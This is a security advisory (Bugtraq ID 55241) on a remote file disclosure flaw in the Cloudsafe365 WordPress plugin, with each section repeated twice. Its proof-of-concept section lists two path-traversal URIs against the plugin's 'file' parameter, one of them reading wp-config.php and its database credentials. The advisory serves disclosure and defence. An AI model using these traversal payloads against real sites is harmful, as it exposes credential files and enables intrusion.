WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
BID:55241
Info
WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
| Bugtraq ID: | 55241 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 28 2012 12:00AM |
| Updated: | Aug 28 2012 12:00AM |
| Credit: | Jan van Niekerk |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks.
The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks.
Exploit / POC
WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
Attackers can exploit this issue with a browser.
The following exploit URIs are available:
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
Attackers can exploit this issue with a browser.
The following exploit URIs are available:
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
Solution / Fix
WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability
References:
References: